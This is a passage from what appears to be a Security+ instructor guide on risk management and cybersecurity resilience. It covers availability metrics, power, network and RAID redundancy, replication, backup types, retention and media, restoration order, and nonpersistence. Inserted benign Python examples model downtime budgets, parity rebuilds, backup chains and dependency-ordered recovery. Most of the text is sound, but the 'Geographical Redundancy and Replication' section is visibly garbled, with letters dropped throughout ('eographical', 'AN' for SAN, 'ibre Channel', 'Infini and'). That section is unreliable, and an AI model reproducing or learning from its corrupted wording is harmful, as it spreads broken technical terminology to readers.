5. Why are exercises an important part of creating a disaster recovery plan?

Full-scale or functional exercises can identify mistakes in the plan that might not be apparent when drafting procedures. They also help to familiarize staff with the plan.


Lesson 19
Summary
You should be able to explain risk management, business impact analysis, and disaster recovery planning processes and metrics.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, revisit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

Guidelines for Risk Management
Follow these guidelines for supporting risk management assessment:

• Analyze workflows to determine MEFs and PBFs and the assets that support them, using metrics such as MTTF/MTBF and MTTR.

• Identify threat and disaster scenarios, accounting for internal versus external, environmental, person-made, site-specific risk assessment, multiparty, software licensing compliance, IP theft, and legacy systems.

• Prioritizing MEFs, perform business impact analysis to determine inherent risk likelihood and impacts for different threat and disaster scenarios, using metrics such as SLE, ARO, and ALE.

• Define MTD, RTO, and RPO for each function and/or critical system and apply a risk remediation technique (mitigation, transference, avoidance, or acceptance) that meets these targets.

• Summarize risk factors and countermeasures for stakeholders in a risk register, using heat maps for easy interpretation.

• Perform ongoing risk monitoring to determine residual risk and control risk.

• Establish and test functional DRPs to enable effective response to disaster-level events.

Lesson 20
Implementing Cybersecurity Resilience

LESSON INTRODUCTION
Cybersecurity resilience means that even successful intrusions by threat actors have limited impact on confidentiality, integrity, and availability. Provisioning redundancy in storage, power, and network systems, plus effective backup procedures, site resiliency, and effective procedures for change control and configuration management are crucial in maintaining high availability.

Teaching Tip: This lesson focuses on the "recover" function, covering topics such as redundancy, backup, and configuration management.

Lesson Objectives
In this lesson, you will:
• Implement redundancy strategies.
• Implement backup strategies.
• Implement cybersecurity resiliency strategies.


Topic 20A
Implement Redundancy Strategies

EXAM OBJECTIVES COVERED
2.5 Given a scenario, implement cybersecurity resilience

Teaching Tip: This topic starts the coverage of objective 2.5 by looking at power, network, and storage redundancy. This content should be quite familiar to students from Network+, so you should not need to spend too much time on it.

The output of risk assessments and business impact analysis will identify vulnerable business processes. To reduce risks in these processes, you can make the IT systems and other business systems that support them resilient to failure. You must be able to install and configure the systems that provide redundancy for power supply, networking, and storage systems.

Show Slide(s): High Availability

High Availability
One of the key properties of a resilient system is high availability. Availability is the percentage of time that the system is online, measured over the defined period, typically one year. The corollary of availability is downtime, or the amount of time for which the system is unavailable. The maximum tolerable downtime (MTD) metric expresses the availability requirement for a particular business function. High availability is usually loosely described as 24x7 (24 hours per day, 7 days per week) or 24x365 (24 hours per day, 365 days per year). For a critical system, availability will be described as "two nines" (99%) up to five or six nines (99.9999%).

Availability    Annual Downtime (hh:mm:ss)
99.9999%        00:00:32
99.999%         00:05:15
99.99%          00:52:34
99.9%           08:45:36

Downtime is calculated from the sum of scheduled service intervals plus unplanned outages over the period.

System availability can refer to an overall process, but also to availability at the level of a server or individual component.
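The table above is derived, not looked up: each row is the fraction of a 365-day year that the availability percentage leaves unavailable. The following is an added example for this edition, not code from the CompTIA guide. It turns a "number of nines" into a percentage and an annual downtime budget, and then checks a constructed outage log (one scheduled maintenance window and one unplanned failure, both counted as downtime, as the text requires) against that budget. The outage timestamps are constructed.

```python
# Availability percentages as annual downtime budgets, and measured availability
# from an outage log. Added example; not from the CompTIA guide. Outages are
# constructed; scheduled and unplanned outages both count, as the text states.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

SECONDS_PER_YEAR = 365 * 24 * 60 * 60  # 365-day year, as in the table above


def nines(count: int) -> float:
    """'Two nines' -> 99.0, 'five nines' -> 99.999, and so on."""
    if count < 1:
        raise ValueError("at least one nine")
    return 100.0 - 10.0 ** (2 - count)


def downtime_budget(availability_pct: float,
                    period_seconds: int = SECONDS_PER_YEAR) -> timedelta:
    """Total downtime permitted over the period at the given availability."""
    if not 0.0 <= availability_pct <= 100.0:
        raise ValueError("availability must be a percentage")
    return timedelta(seconds=(100.0 - availability_pct) / 100.0 * period_seconds)


def hms(td: timedelta) -> str:
    """Render a duration as hh:mm:ss, rounding to the nearest second."""
    total = int(round(td.total_seconds()))
    hours, rem = divmod(total, 3600)
    minutes, seconds = divmod(rem, 60)
    return f"{hours:02d}:{minutes:02d}:{seconds:02d}"


@dataclass(frozen=True)
class Outage:
    start: datetime
    end: datetime
    scheduled: bool   # maintenance window or unplanned failure; both are downtime

    def duration(self) -> timedelta:
        if self.end < self.start:
            raise ValueError("outage ends before it starts")
        return self.end - self.start


def total_downtime(outages: List[Outage]) -> timedelta:
    return sum((o.duration() for o in outages), timedelta())


def measured_availability(outages: List[Outage],
                          period_seconds: int = SECONDS_PER_YEAR) -> float:
    """Availability achieved over the period, as a percentage."""
    return 100.0 * (1.0 - total_downtime(outages).total_seconds() / period_seconds)


def meets_target(outages: List[Outage], target_pct: float) -> bool:
    return total_downtime(outages) <= downtime_budget(target_pct)


# Constructed outage log for one year: a scheduled 3-hour patch window and a
# 40-minute unplanned failure.
OUTAGES = [
    Outage(datetime(2021, 3, 14, 2, 0), datetime(2021, 3, 14, 5, 0), scheduled=True),
    Outage(datetime(2021, 8, 2, 9, 10), datetime(2021, 8, 2, 9, 50), scheduled=False),
]

if __name__ == "__main__":
    for n in range(2, 7):
        print(f"{nines(n):<9} {hms(downtime_budget(nines(n)))}")
    print(f"measured {measured_availability(OUTAGES):.4f}%")
```

The four rows of the table fall out of downtime_budget for 99.9999 through 99.9, and running the script also shows that two nines allow over 87 hours a year. The constructed log totals 3 hours 40 minutes, which fits comfortably inside a 99.9% target but is roughly four times the budget for 99.99%, so a single patch window of that length would already breach the higher target regardless of how reliable the hardware is.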

Scalability and Elasticity
High availability also means that a system is able to cope with rapid growth in demand. These properties are referred to as scalability and elasticity. Scalability is the capacity to increase resources to meet demand within similar cost ratios. This means that if service demand doubles, costs do not more than double. There are two types of scalability:
• To scale out is to add more resources in parallel with existing resources.
• To scale up is to increase the power of existing resources.

Elasticity refers to the system's ability to handle these changes on demand in real time. A system with high elasticity will not experience loss of service or performance if demand suddenly increases rapidly.

Fault Tolerance and Redundancy
A system that can experience failures and continue to provide the same (or nearly the same) level of service is said to be fault tolerant. Fault tolerance is often achieved by provisioning redundancy for critical components and single points of failure. A redundant component is one that is not essential to the normal function of a system but that allows the system to recover from the failure of another component.

Show Slide(s): Power Redundancy

Power Redundancy
All types of computer systems require a stable power supply to operate. Electrical events, such as voltage spikes or surges, can crash computers and network appliances, while loss of power from brownouts or blackouts will cause equipment to fail. Power management means deploying systems to ensure that equipment is protected against these events and that network operations can either continue uninterrupted or be recovered quickly.

Dual Power Supplies
An enterprise-class server or appliance enclosure is likely to feature two or more power supply units (PSUs) for redundancy. A hot-plug PSU can be replaced (in the event of failure) without powering down the system.

Managed Power Distribution Units (PDUs)
The power circuits supplying grid power to a rack, network closet, or server room must be enough to meet the load capacity of all the installed equipment, plus room for growth. Consequently, circuits to a server room will typically be rated for higher capacity than domestic or office circuits. These circuits may be run through a power distribution unit (PDU). These come with circuitry to "clean" the power signal, provide protection against spikes, surges, and brownouts, and can integrate with uninterruptible power supplies (UPSs). Managed PDUs support remote power monitoring functions, such as reporting load and status, switching power to a socket on and off, or switching sockets on in a particular sequence.

Battery Backups and Uninterruptible Power Supplies (UPSs)
If there is loss of power, system operation can be sustained for a few minutes or hours (depending on load) using battery backup. Battery backup can be provisioned at the component level for disk drives and RAID arrays. The battery protects any read or write operations cached at the time of power loss. At the system level, an uninterruptible power supply (UPS) will provide a temporary power source in the event of a blackout (complete power loss). This may range from a few minutes for a desktop-rated model to hours for an enterprise system. In its simplest form, a UPS comprises a bank of batteries and their charging circuit plus an inverter to generate AC voltage from the DC voltage supplied by the batteries.

The time allowed by a UPS should be sufficient to failover to an alternative power source, such as a standby generator. If there is no secondary power source, a UPS will at least allow the administrator to shut down the server or appliance properly (users can save files, and the OS can complete the proper shut-down routines).


Generators
A backup power generator can provide power to the whole building, often for several days. Most generators use diesel, propane, or natural gas as a fuel source. With diesel and propane, the main drawback is safe storage (diesel also has a limited shelf life, measured in months up to about two years); with natural gas, the issue is the reliability of the gas supply in the event of a natural disaster. Data centers are also investing in renewable power sources, such as solar, wind, geothermal, hydrogen fuel cells, and hydro. The ability to use renewable power is a strong factor in determining the best site for new data centers. Large-scale battery solutions, such as Tesla's Powerpack (tesla.com/powerpack), may be able to provide an alternative to backup power generators. There are also emerging technologies to use all the battery resources of a data center as a microgrid for power storage (scientificamerican.com/article/how-big-batteries-at-data-centers-could-replace-power-plants).

A UPS is always required to protect against any interruption to computer services. A backup generator cannot be brought online fast enough to respond to a power failure, so the UPS must bridge the gap between the outage and the generator reaching stable output.

Show Slide(s): Network Redundancy

Network Redundancy
Networking is another critical resource where a single point of failure could cause significant service disruption.

Network Interface Card (NIC) Teaming
Network interface card (NIC) teaming, or adapter teaming, means that the server is installed with multiple NICs, or NICs with multiple ports, or both. Each port is connected to separate network cabling. During normal operation, this can provide a high-bandwidth link. For example, four ports of the same link speed give four times the bandwidth of a single port. If there is a problem with one cable, or one NIC, the network connection will continue to work, though at just three-quarters of that aggregate bandwidth.

For the system to be fault tolerant, the higher bandwidth must not be critical to the function.

Switching and Routing
Network cabling should be designed to allow for multiple paths between the various switches and routers, so that during a failure of one part of the network, the rest remains operational.

Multiple switching paths require use of Spanning Tree Protocol (STP) to prevent loops.

Load Balancers
NIC teaming provides load balancing at the adapter level. Load balancing and clustering can also be provisioned at a service level:
• A load balancing switch distributes workloads between available servers.
• A load balancing cluster enables multiple redundant servers to share data and session information to maintain a consistent service if there is failover from one server to another.


Show Slide(s): Disk Redundancy

Disk Redundancy
Disk and storage resources are critically dependent on redundancy. While backup provides integrity for when a disk fails, to restore from backup would require installing a new storage unit, restoring the data, and testing the system configuration. Disk redundancy ensures that a server can continue to operate if one, or possibly more, storage devices fail.

Redundant Array of Independent Disks (RAID)
When a storage system is configured as a Redundant Array of Independent Disks (RAID), many disks can act as backups for each other to increase reliability and fault tolerance. If one disk fails, the data is not lost, and the server can keep functioning. Note that RAID protects against device failure only: accidental deletion, corruption, or ransomware is written to every disk in the array, so RAID complements backup rather than replacing it. The RAID advisory board defines RAID levels, numbered from 0 to 6, where each level corresponds to a specific type of fault tolerance. There are also proprietary and nested RAID solutions. Some of the most commonly implemented types of RAID are listed in the following table.

RAID Level                 Fault Tolerance
Level 1                    Mirroring means that data is written to two disks simultaneously, providing redundancy (if one disk fails, there is a copy of data on the other). The main drawback is that storage efficiency is only 50%.
Level 5                    Striping with parity means that data is written across three or more disks, but additional information (parity) is calculated. This allows the volume to continue if one disk is lost. This solution has better storage efficiency than RAID 1.
Level 6                    Double parity, or level 5 with an additional parity stripe, allows the volume to continue when two devices have been lost.
Nested (0+1, 1+0, or 5+0)  Nesting RAID sets generally improves performance or redundancy. For example, some nested RAID solutions can support the failure of more than one disk.

RAID level 0 refers to striping without parity. Data is written in blocks across several disks simultaneously, but with no redundancy. This can improve performance, but if one disk fails, so does the whole volume, and data on it will be corrupted. There are some use cases for RAID 0, but typically striping without parity is only implemented to improve performance in a nested RAID solution.
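The table states that striping with parity survives one lost disk and that double parity survives two; the reason is simple arithmetic over the blocks in each stripe, and it is worth seeing once. The following is an added example for this edition, not code from the CompTIA guide. It stripes a byte string across a chosen number of data disks plus one XOR parity disk, discards a disk, rebuilds it from the survivors, and shows that a second simultaneous loss cannot be recovered with single parity. The parity is kept on a fixed disk (the RAID 4 layout) purely to keep the code short; RAID 5 rotates parity across the disks, which changes nothing about the reconstruction. Block size and payload are constructed.

```python
# Striping with single parity on byte strings: stripe data across N data disks
# plus one XOR parity disk, lose a disk, rebuild it, and show why a second loss
# is fatal. Added example; not from the CompTIA guide. Parity lives on a fixed
# disk here (RAID 4-style layout) for brevity; RAID 5 rotates it, same arithmetic.
from typing import List, Optional

BLOCK = 4  # bytes per block; deliberately tiny for readability


def xor_blocks(blocks: List[bytes]) -> bytes:
    """XOR equal-length blocks together."""
    out = bytearray(len(blocks[0]))
    for b in blocks:
        for i, byte in enumerate(b):
            out[i] ^= byte
    return bytes(out)


def stripe(data: bytes, data_disks: int) -> List[List[bytes]]:
    """Return disks[disk][stripe_index]; the last disk holds parity. Data is zero-padded."""
    if data_disks < 2:
        raise ValueError("striping with parity needs at least two data disks")
    stripe_bytes = BLOCK * data_disks
    padded = data + b"\x00" * (-len(data) % stripe_bytes)
    disks: List[List[bytes]] = [[] for _ in range(data_disks + 1)]
    for off in range(0, len(padded), stripe_bytes):
        chunks = [padded[off + i * BLOCK: off + (i + 1) * BLOCK] for i in range(data_disks)]
        for i, chunk in enumerate(chunks):
            disks[i].append(chunk)
        disks[data_disks].append(xor_blocks(chunks))  # parity = XOR of the data blocks
    return disks


def rebuild(disks: List[Optional[List[bytes]]]) -> List[List[bytes]]:
    """Reconstruct exactly one missing disk (None). In each stripe the XOR of all
    surviving blocks equals the missing block, whether it held data or parity."""
    missing = [i for i, d in enumerate(disks) if d is None]
    if len(missing) != 1:
        raise ValueError(f"single parity rebuilds one lost disk, not {len(missing)}")
    survivors = [d for d in disks if d is not None]
    rebuilt = [xor_blocks([d[s] for d in survivors]) for s in range(len(survivors[0]))]
    return [d if d is not None else rebuilt for d in disks]


def read_back(disks: List[List[bytes]], length: int) -> bytes:
    """Reassemble the original data from the data disks (parity disk excluded)."""
    data_disks = len(disks) - 1
    out = bytearray()
    for s in range(len(disks[0])):
        for i in range(data_disks):
            out += disks[i][s]
    return bytes(out[:length])


def survives_loss(data: bytes, data_disks: int, lost: List[int]) -> bool:
    """True if the data can still be read intact after losing the given disks."""
    disks: List[Optional[List[bytes]]] = list(stripe(data, data_disks))
    for i in lost:
        disks[i] = None
    try:
        return read_back(rebuild(disks), len(data)) == data
    except ValueError:
        return False


def storage_efficiency(data_disks: int) -> float:
    """Usable fraction of raw capacity with one parity disk."""
    return data_disks / (data_disks + 1)


# Constructed payload.
RECORD = b"order 4182: 3 x widget, ship to warehouse B"

if __name__ == "__main__":
    print("one data disk lost, rebuilt:", survives_loss(RECORD, 3, [1]))
    print("parity disk lost, rebuilt:", survives_loss(RECORD, 3, [3]))
    print("two disks lost:", survives_loss(RECORD, 3, [0, 2]))
    print(f"efficiency with 3 data disks: {storage_efficiency(3):.0%}")
```

Losing any single disk, including the parity disk itself, is recoverable; losing two is not, which is the gap RAID 6 closes by computing a second, independent parity value. The storage_efficiency result (75% with three data disks, rising as disks are added) is the advantage over mirroring's fixed 50% that the table refers to.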

Multipath
Where RAID provides redundancy for the storage devices, multipath is focused on the bus between the server and the storage devices or RAID array. A storage system is accessed via some type of controller. The controller might be connected to disk units locally installed in a server, or it might connect to storage devices within a storage area network (SAN). Multipath input/output (I/O) ensures that there is controller redundancy and/or multiple network paths to the storage devices.


Show Slide(s) Geographical Redundancy and Replication


eographical
Data replication is technology that maintains e act copies of data at more than one
edundancy and location. AID mirroring and parity implement types of replication between local
eplication storage devices. Data replication can be applied in many other conte ts
• torage Area Network AN most enterprise storage is configured as a AN. A
AN is a high speed fiber optic network of storage devices built from technologies
such as ibre Channel, mall Computer ystem Interface C I , or Infini and.
edundancy can be provided within the AN, and replication can also take place
between ANs using AN links.

• Database much data is stored within a database. here a database is replicated


between multiple servers or sites, it is very important to maintain consistency
between the replicas. Database management systems come with specific tools to
implement di erent kinds of replication.

• irtual Machine M the same M instance may need to be deployed in multiple


locations. This can be achieved by replicating the M's disk image and configuration
settings.

Geographical Dispersal
Geographical dispersal refers to data replicating hot and warm sites that are
physically distant from one another. This means that data is protected against a
natural disaster wiping out storage at one of the sites. This is also described as a geo
redundant solution.

Asynchronous and Synchronous Replication
Synchronous replication is designed to write data to all replicas simultaneously. Therefore, all replicas should always have the same data all of the time. Asynchronous replication writes data to the primary storage first, and then copies data to the replicas at scheduled intervals.
Asynchronous replication isn't a good choice for a solution that requires data in multiple locations to be consistent, such as data from product inventory lists accessed in different regions. Many geo-redundant replication services rely on asynchronous replication due to the distances between data centers in multiple regions. In some cases, business solutions work around the limitations of asynchronous replication. For example, an online retailer may choose only to show inventory from their local regional warehouse.

On-Premises versus Cloud
High availability through redundancy and replication is resource intensive, especially when configuring multiple hot or warm sites. For on-premises sites, provisioning the storage devices and high-bandwidth, low-latency WAN links required between two geographically dispersed hot sites could incur unaffordable costs. This cost is one of the big drivers of cloud services, where local and geographic redundancy are built into the system, if you trust the CSP to operate the cloud effectively. For example, in the cloud, geo-redundancy replicates data or services between data centers physically located in two different regions. Disasters that occur at the regional level, like earthquakes, hurricanes, or floods, should not impact availability across multiple zones.


Review Activity:
Redundancy Strategies
Answer the following questions:

1. How does MTD relate to availability?

The maximum tolerable downtime (MTD) metric expresses the availability requirement for a particular business function.

2. How does elasticity differ from scalability?

A scalable system is one that responds to increased workloads by adding resources without exponentially increasing costs. An elastic system is able to assign or unassign resources as needed to match either an increased workload or a decreased workload.

3. Which two components are required to ensure power redundancy for a blackout period extending over 24 hours?

An uninterruptible power supply is required to provide failover for the initial blackout event, before switching over to a standby generator to supply power over a longer period.

4. How does RAID support fault tolerance?

Aside from RAID 0, RAID provides redundancy between a group of disks, so that if one disk were to fail, that data may be recoverable from the other disks in the array.


Topic 20B
Implement Backup Strategies

EXAM OBJECTIVES COVERED
2.5 Given a scenario, implement cybersecurity resilience

Teaching Tip: While this is a critical area of content, it should be possible to summarize quickly. Focus on distinguishing incremental and differential and discuss order of restoration.

No cybersecurity program is complete without an effective and tested system for backing up and restoring critical data and system configurations. As a security professional, you need to be able to select appropriate backup types and media for different scenarios and explain how nonpersistence can achieve more secure system configurations, as well as maintaining high availability.

Show Slide(s): Backups and Retention Policy

Backups and Retention Policy
Every business continuity and disaster recovery plan makes use of backups, of one type or another. The execution and frequency of backups must be carefully planned and guided by policies. Data retention needs to be considered in the short and long term:
• In the short term, files that change frequently might need retaining for version control. Short-term retention is also important in recovering from malware infection. Consider the scenario where a backup is made on Monday, a file is infected with a virus on Tuesday, and when that file is backed up later on Tuesday, the copy made on Monday is overwritten. This means that there is no good means of restoring the uninfected version of the file. Short-term retention is determined by how often the youngest media sets are overwritten.

• In the long term, data may need to be stored to meet legal requirements or to comply with company policies or industry standards. Any data that must be retained in a particular version past the oldest sets should be moved to archive storage.


Performing a backup using Acronis Backup. (Screenshot used with permission from Acronis.)

For these reasons, backups are kept back to certain points in time. As backups take up a lot of space, and there is never limitless storage capacity, this introduces the need for storage management routines to reduce the amount of data occupying backup storage media while giving adequate coverage of the required recovery window. The recovery window is determined by the recovery point objective (RPO), which is determined through business continuity planning. Advanced backup software can prevent media sets from being overwritten in line with the specified retention policy.

Backing up a domain controller using Acronis Backup. The How Long to Keep field specifies the retention period. (Screenshot used with permission from Acronis.)


Show Slide(s): Backup Types

Backup Types
Utilities that support enterprise backup operations come with features to support retention policies and media rotation. When considering a backup made against an original copy of data, the backup can usually be performed using one of three main types: full, incremental, and differential. In Windows, a full backup includes all selected files and directories while incremental and differential backups check the status of the archive attribute before including a file. The archive attribute is set whenever a file is modified. This allows backup software to determine which files have been changed and therefore need to be copied.

Teaching Tip: Students need to understand the distinction between incremental and differential backups.

Linux doesn't support a file archive attribute. Instead, a date stamp is used to determine whether the file has changed.

Full, Incremental, and Differential Backup Types

The following table summarizes the three different backup types.

Type: Full
Data selection: All selected data, regardless of when it was previously backed up
Backup/restore time: High/low (one tape set)
Archive attribute: Cleared

Type: Incremental
Data selection: New files, as well as files modified since the last backup
Backup/restore time: Low/high (multiple tape sets)
Archive attribute: Cleared

Type: Differential
Data selection: All new and modified files since the last full backup
Backup/restore time: Moderate/moderate (no more than two sets)
Archive attribute: Not cleared

Differential and incremental backup and restore operations.


The factors that determine which method to use are the time it takes to restore versus the time it takes to back up. Assuming a backup is performed every working day, an incremental backup only includes files changed during that day, while a differential backup includes all files changed since the last full backup. Incremental backups save backup time but can be more time consuming when the system must be restored. The system must be restored from the last full backup set and then from each incremental backup that has subsequently occurred. A differential backup system only involves two tape sets when restoration is required.

Do not combine differential and incremental backups. Use full backups interspersed with differential backups or full backups interspersed with incremental backups.
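To make the archive-attribute logic and the restore chains in the table concrete, here is an added simulation (not code from the CompTIA guide) that runs a Monday full backup followed by three daily backups under each scheme on three constructed files, and reports how much data each scheme copies and which media sets a restore must apply.

```python
"""Added example, not from the CompTIA guide: simulate full, incremental and
differential backups driven by the Windows archive attribute, then compare
how much data each scheme copies and how many media sets a restore needs.
The file names and the Monday-to-Thursday schedule are constructed."""
from dataclasses import dataclass, field


@dataclass
class File:
    name: str
    version: int = 1
    archive: bool = True  # the OS sets this bit whenever the file is modified


@dataclass
class BackupSet:
    kind: str  # "full", "incremental" or "differential"
    day: str
    contents: dict = field(default_factory=dict)  # file name -> version copied


def run_backup(kind, day, files):
    """Select files as in the table: a full backup takes everything, the other
    two take files whose archive attribute is set. Full and incremental clear
    the attribute afterwards; differential leaves it set."""
    selected = [f for f in files if kind == "full" or f.archive]
    if kind in ("full", "incremental"):
        for f in selected:
            f.archive = False
    return BackupSet(kind, day, {f.name: f.version for f in selected})


def modify(files, name):
    """Simulate a user editing a file: new version, archive attribute set."""
    for f in files:
        if f.name == name:
            f.version += 1
            f.archive = True


def restore_chain(sets):
    """Media sets a restore must apply, oldest first: the last full backup plus
    every later incremental, or the last full plus only the newest differential."""
    last_full = max(i for i, s in enumerate(sets) if s.kind == "full")
    later = sets[last_full + 1:]
    differentials = [s for s in later if s.kind == "differential"]
    if differentials:
        return [sets[last_full], differentials[-1]]
    return [sets[last_full]] + later


def restore(sets):
    """Apply the restore chain in order; later sets overwrite earlier versions."""
    state = {}
    for s in restore_chain(sets):
        state.update(s.contents)
    return state


def copied_items(sets):
    """Total file copies written across all media sets (the backup-time cost)."""
    return sum(len(s.contents) for s in sets)


def simulate(scheme):
    """Full backup on Monday, then one backup of the given scheme per day."""
    files = [File("report.doc"), File("ledger.xls"), File("deck.ppt")]
    sets = [run_backup("full", "Mon", files)]
    for day, changed in (("Tue", "report.doc"), ("Wed", "ledger.xls"),
                         ("Thu", "report.doc")):
        modify(files, changed)
        sets.append(run_backup(scheme, day, files))
    return sets


if __name__ == "__main__":
    for scheme in ("incremental", "differential"):
        sets = simulate(scheme)
        print(f"{scheme}: copies written={copied_items(sets)}, "
              f"sets needed to restore={len(restore_chain(sets))}")
        for s in restore_chain(sets):
            print(f"  {s.day} {s.kind}: {s.contents}")
```

Both schemes restore the same final state; the incremental run writes fewer copies (6 versus 8) but needs all four sets to restore, while the differential run needs only the Monday full set and the Thursday set.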

Copy Backups
Most software also has the capability to do copy backups. These are made outside the tape rotation system and do not affect the archive attribute.

Show Slide(s): Snapshots and Images

Snapshots and Images
Snapshots are a means of getting around the problem of open files. If the data that you're considering backing up is part of a database, such as SQL data or an Exchange messaging system, then the data is probably being used all the time. Often copy-based mechanisms will be unable to back up open files. Short of closing the files, and so too the database, a copy-based system will not work. A snapshot is a point-in-time copy of data maintained by the file system. A backup program can use the snapshot rather than the live data to perform the backup. In Windows, snapshots are provided for on NTFS volumes by the Volume Shadow Copy Service (VSS). They are also supported on Sun's ZFS file system, and under some enterprise distributions of Linux.

Configuring VSS settings in Acronis Backup. (Screenshot used with permission from Acronis.)


Virtual system managers can usually take snapshot or cloned copies of VMs. A snapshot remains linked to the original VM, while a clone becomes a separate VM from the point that the cloned image was made.
An image backup is made by duplicating an installation. This can be done either from a physical hard disk or from a VM's virtual hard disk. Imaging allows the system to be redeployed quickly, without having to reinstall third-party software, patches, and configuration settings. A system image should generally not contain any user data files, as these will quickly become out of date.

Show Slide(s): Backup Storage Issues

Backup Storage Issues
Backed up and archived data need to be stored as securely as live data. A data backup has the same confidentiality and integrity requirements as its source. It also has its own availability requirement. Typically, backup media is physically secured against theft or snooping by keeping it in a restricted part of the building, with other server and network equipment. Many backup solutions use encryption to ensure data confidentiality should the media be stolen.

Teaching Tip: Make sure students can distinguish onsite/offsite and online/offline.

Offsite Storage
Additionally, you must plan for events that could compromise both the live data and the backup set. Natural disasters, such as fires, earthquakes, and floods, could leave an organization without a data backup, unless they have kept a copy offsite. Distance consideration is a calculation of how far offsite the backup needs to be kept, given different disaster scenarios. On the one hand, the media must be kept far away enough not to be damaged by the disaster; on the other, media access should not slow down a recovery operation too much.
Without a network that can support the required bandwidth, the offsite media must be physically brought onsite (and if there is no second set of offsite media, data is at substantial risk at this time), the latest backup performed, and then removed to offsite storage again. Quite apart from the difficulty and expense of doing this, there are data confidentiality and security issues in transporting the data. In recent years, high-bandwidth Internet and high-capacity cloud storage providers have made offsite backup solutions much more affordable and easy to implement.

Online versus Offline Backups

As well as the onsite/offsite consideration, you should also be aware of a distinction between online and offline backups. An online backup system is instantly available to perform a backup or restore operation without an administrator having to transport and connect a device or load some backup media. An offline backup is disconnected from the host and must be connected manually.
An online system is faster, but an offline backup offers better security. Consider the case of cryptoransomware, for instance. If the backup system is connected to the infected host, the ransomware will encrypt the backup, rendering it useless. Some cryptoransomware is configured to try to access cloud accounts and encrypt the cloud storage (f-secure.com/v-descs/articles/crypto-ransomware.shtml).

The 3-2-1 rule states that you should have three copies of your data, across two media types, with one copy held offline and offsite.

Show Slide(s): Backup Media Types

Teaching Tip: These technologies should be familiar to students from A+ and Network+.

Backup Media Types
A backup operation can use several media types. Each type has advantages and disadvantages that make it more or less suitable for given scenarios.


Disk
Individual removable hard drives are an excellent low-cost option for network backups, but they do not have sufficient capacity or flexibility to be used within an automated enterprise backup solution.

Network Attached Storage (NAS)
A network attached storage (NAS) appliance is a specially configured type of server that makes RAID storage available over common network protocols, such as Windows File Sharing (SMB) or FTP. A NAS appliance is accessed via an IP address and backup takes place at file level. A NAS can be another good option for backup, but as a single device, it provides no offsite option. As it is normally kept online, it can be vulnerable to cryptoransomware as well.

Tape
Digital tape systems are a popular choice for institutions with multi-terabyte storage requirements. Tape is very cost effective and, given a media rotation system, tapes can be transported offsite. The latest generation of tape stores several terabytes per cartridge, and considerably more with compression. The main drawback of tape is that it is slow, compared to disk-based solutions, especially for restore operations.

Storage Area Network (SAN) and Cloud
A RAID array or tape drive autoloader can be provisioned as direct attached storage, where a server hosts the backup devices, usually over serial attached SCSI (SAS). Direct attached storage has limited scalability, so enterprise and cloud storage solutions often use storage area networks (SAN) as a layer of abstraction between the file system objects presented to servers and the configuration of the actual storage media. Where NAS uses file-level access to storage, a SAN is based on block-level addressing. A SAN can incorporate RAID arrays and tape systems within the same network. SANs can achieve offsite storage through replication.

Show Slide(s): Restoration Order

Restoration Order
If a site suffers an uncontrolled outage, in ideal circumstances processing will be switched to an alternate site and the outage can be resolved without any service interruption. If an alternate processing site is not available, then the main site must be brought back online as quickly as possible to minimize service disruption. This does not mean that the process can be rushed, however. A complex facility such as a data center or campus network must be reconstituted according to a carefully designed order of restoration. If systems are brought back online in an uncontrolled way, there is the serious risk of causing additional power problems or of causing problems in the network, OS, or application layers because dependencies between different appliances and servers have not been met.

Teaching Tip: British Airways' data center problems make a good example of why order of restoration is a critical topic (computerweekly.com, "The British Airways IT outage: What went wrong with its datacentre").

In very general terms, the order of restoration will be as follows:

1. Enable and test power delivery systems (grid power, power distribution units [PDUs], UPS, secondary generators, and so on).

2. Enable and test switch infrastructure, then routing appliances and systems.

3. Enable and test network security appliances (firewalls, IDS, proxies).

4. Enable and test critical network servers (DHCP, DNS, NTP, and directory services).

5. Enable and test back-end and middleware (databases and business logic). Verify data integrity.


6. Enable and test front-end applications.

7. Enable client workstations and devices and client browser access.
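As an added illustration of the seven-step order above (not code from the CompTIA guide), the following script models the layers and a constructed set of dependencies between systems, derives a power-up sequence that honours them, and flags the unmet dependencies that a rushed sequence would cause. The system names, layer numbers and dependency map are all assumptions for the example.

```python
"""Added example, not from the CompTIA guide: check a proposed power-up
sequence against the layered order of restoration above. The system names,
their layer numbers and their dependencies are constructed for illustration."""

# Layer each system belongs to, numbered as in the seven steps above.
LAYER = {
    "power": 1, "switches": 2, "routers": 2, "firewall": 3, "ids": 3,
    "dhcp": 4, "dns": 4, "ntp": 4, "directory": 4,
    "database": 5, "middleware": 5, "webapp": 6, "workstations": 7,
}

# What each system needs to be up and tested before it is started (constructed).
DEPENDS_ON = {
    "switches": ["power"], "routers": ["switches"], "firewall": ["routers"],
    "ids": ["switches"], "dhcp": ["switches"], "dns": ["routers"],
    "ntp": ["dns"], "directory": ["dns", "ntp"], "database": ["directory"],
    "middleware": ["database"], "webapp": ["middleware", "firewall"],
    "workstations": ["dhcp", "webapp"],
}


def unmet_dependencies(sequence):
    """Walk the sequence and report each system that would be started before
    something it depends on (the unmet-dependency risk described in the text)."""
    up, problems = set(), []
    for name in sequence:
        missing = [d for d in DEPENDS_ON.get(name, []) if d not in up]
        if missing:
            problems.append((name, missing))
        up.add(name)
    return problems


def planned_order(systems):
    """Build an order that satisfies every dependency, starting lower layers
    first (Kahn's algorithm with the layer number as the tie-breaker)."""
    remaining, up, order = set(systems), set(), []
    while remaining:
        ready = [s for s in remaining
                 if all(d in up for d in DEPENDS_ON.get(s, []))]
        if not ready:
            raise ValueError(f"circular dependency among {sorted(remaining)}")
        nxt = min(ready, key=lambda s: (LAYER[s], s))
        order.append(nxt)
        up.add(nxt)
        remaining.remove(nxt)
    return order


if __name__ == "__main__":
    print("planned:", " -> ".join(planned_order(LAYER)))
    rushed = ["power", "switches", "webapp", "workstations"]
    print("rushed sequence problems:", unmet_dependencies(rushed))
```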

Show Slide(s): Nonpersistence

Nonpersistence
When recovering systems, it may be necessary to ensure that any artifacts from the disaster, such as malware or backdoors, are removed when reconstituting the production environment. This can be facilitated in an environment designed for nonpersistence. Nonpersistence means that any given instance is completely static in terms of processing function. Data is separated from the instance so that it can be swapped out for an "as new" copy without suffering any configuration problems. There are various mechanisms for ensuring nonpersistence:
• Snapshot/revert to known state: this is a saved system state that can be reapplied to the instance.

• Rollback to known configuration: a physical instance might not support snapshots but has an internal mechanism for restoring the baseline system configuration, such as Windows System Restore.

